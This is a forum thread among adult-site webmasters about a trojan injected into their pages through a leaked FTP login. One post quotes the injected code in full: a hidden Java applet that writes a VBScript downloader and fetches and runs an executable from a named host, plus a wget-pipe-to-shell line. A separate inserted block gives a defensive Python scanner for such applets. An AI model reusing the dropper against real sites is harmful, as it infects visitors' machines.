2010-06-03, 07:27 AM | #1
wtfwjd?
Join Date: May 2007
Posts: 2,103
Trojan horse on my sites
Avast is reporting problems on some of my sites:
Code:
http://www.lusciousdelights.com/
http://www.joyporn.net/
http://sleazyporntube.com/
http://www.pantyerotica.com/
http://fuckingfreeforall.com/
2010-06-03, 09:14 AM | #2
Certified Nice Person
I have AVG integrated with my Google search, and they're still saying your sites are safe, so that's good. As long as you get it fixed before Google begins de-listing you, you'll be fine. I clicked through to all of them, and only the free-for-all site is popping something suspicious. Something about an unverified application attempting to run.
__________________
Click here to purchase a bridge I'm selling.
2010-06-03, 09:34 AM | #3
Subversive filth of the hedonistic decadent West
Join Date: Mar 2003
Location: Southeast Florida
Posts: 27,936
Quote:
Code:
<applet width='0' height='0' code='Client.class' archive='Client.jar'> <param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs http://galengroup.org/1.exe %temp%\update.exe'> <param name='windows2' value=''> <param name='unix1' value=""> <param name='unix2' value=""> <param name='linux1' value="wget http://galengroup.org/1.exe -O- | sh"> <param name='linux2' value=""> </applet> |
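A defender-side check for the kind of injection quoted in this post (an added example, not code from this thread or from any vendor mentioned in it): it walks a document root and flags invisible applets whose param values carry dropper commands. The sample page, the marker list and the placeholder host are constructed for the example.

```python
"""Scan web files for injected zero-size <applet> droppers like the one quoted above."""
import re
from pathlib import Path

# Heuristics drawn from the quoted injection: a 0x0 applet whose <param>
# values contain Windows/VBScript or shell download-and-run commands.
ZERO_SIZE_APPLET = re.compile(
    r"<applet\b[^>]*\bwidth=['\"]?0['\"]?[^>]*\bheight=['\"]?0['\"]?", re.I)
DROPPER_MARKERS = (
    "cmd.exe /c", "%temp%", "WinHttp.WinHttpRequest", "ADODB", "wget ", "| sh",
)

def find_injected_applets(html: str):
    """Return one finding per suspicious <applet> block: offset, hidden flag, markers."""
    findings = []
    for m in re.finditer(r"<applet\b.*?</applet>", html, re.I | re.S):
        block = m.group(0)
        markers = [k for k in DROPPER_MARKERS if k.lower() in block.lower()]
        hidden = bool(ZERO_SIZE_APPLET.search(block))
        if hidden or markers:
            findings.append({"offset": m.start(), "hidden": hidden, "markers": markers})
    return findings

def scan_tree(root: str):
    """Walk a document root; map each file path to its findings (only files with hits)."""
    hits = {}
    for p in Path(root).rglob("*"):
        if p.suffix.lower() in {".html", ".htm", ".php", ".tpl"}:
            try:
                found = find_injected_applets(p.read_text(errors="replace"))
            except OSError:
                continue
            if found:
                hits[str(p)] = found
    return hits

# Constructed sample page: one benign applet plus one injected hidden dropper
# (the host is a placeholder, not a real indicator).
SAMPLE = """<html><body>
<applet width='300' height='200' code='Game.class'></applet>
<applet width='0' height='0' code='Client.class' archive='Client.jar'>
<param name='windows1' value='cmd.exe /c echo x > %temp%\\w.vbs'>
<param name='linux1' value="wget http://EXAMPLE-PLACEHOLDER/1.exe -O- | sh">
</applet></body></html>"""

if __name__ == "__main__":
    for finding in find_injected_applets(SAMPLE):
        print(finding)
```

Run it against the web root after a compromise is suspected; a finding with `hidden` set and several markers is the signature of this particular injection, and a match in a template file points at the file the attacker modified over FTP.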
2010-06-03, 10:37 AM | #4
wtfwjd?
Join Date: May 2007
Posts: 2,103
Chris at Colo-Cation is on it, looks like it's fixed. I just notified him this morning a little while ago, so it was a very quick response and fix.
It looks like someone uploaded something via FTP using my login. The interesting thing is, I recently entered my login info in the "hidden" area at JBM software's support forum for Jeremy to check something out. That's the only time I have ever given this info out...hmmm
2010-06-03, 11:47 AM | #5
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
That would explain the other client with tubex being compromised from the same IP.
__________________
SnapReplay.com a different way to share photos - iPhone & Android
2010-06-03, 12:03 PM | #6
"Young dumb and full of cum"
Is this a tubex related incident or JBM Soft?
All of a sudden I'm a little worried now.
__________________
JAPANESE ADULT AFFILIATE PROGRAM
2010-06-03, 12:16 PM | #7
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
The hacker used the FTP username/password to modify a few files on the server. Generally when that happens, the username/password has been leaked somewhere through a keylogger/spyware/trojan or, like this case, a vendor storing the user/password/hostname in the clear somewhere.
When you give a password to a vendor, you should change it after they are done, or, change it to something, give it to them, and then change it after they are done. You would be surprised at the frequency this happens.
__________________
SnapReplay.com a different way to share photos - iPhone & Android
2010-06-03, 12:22 PM | #8
Subversive filth of the hedonistic decadent West
Join Date: Mar 2003
Location: Southeast Florida
Posts: 27,936
Quote:
I did this just last month after I wanted JBM Soft to take a look at my install of TubeX.
2010-06-03, 02:17 PM | #9
wtfwjd?
Join Date: May 2007
Posts: 2,103
Quote:
Guess you can't be too careful...live and learn.
2010-06-03, 03:43 PM | #10
Well you know boys, a nuclear reactor is a lot like women. You just have to read the manual and press the right button
Join Date: Sep 2003
Location: United Kingdom
Posts: 150
Had this happen to me too, but not with JBM: created a temp FTP account, and sure enough, after the company had used it, someone else sneaked in and installed a load of crap on the server.